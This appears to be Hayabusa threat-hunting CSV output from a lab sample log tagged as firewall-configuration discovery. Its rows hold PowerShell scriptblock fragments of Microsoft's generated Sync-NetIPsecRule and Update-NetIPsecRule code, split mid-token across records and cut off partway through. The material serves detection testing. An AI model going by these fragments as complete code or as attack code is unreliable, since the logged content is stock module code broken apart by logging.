[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Servers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Domains}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAsso",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ciatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion] ${AddressType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DnsServers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_que",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Servers')) { [object]$__cmdletization_value = ${Servers} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Domains')) { [object]$__cmdletization_value = ${Domains} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AddressType')) { [object]$__cmdletization_value = ${AddressType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DnsServers')) { [object]$__cmdletization_value = ${DnsServers} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('SyncPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Sync-NetIPsecRule' function Update-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction] ${Action}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv6Addresses}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv4Addresses}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] 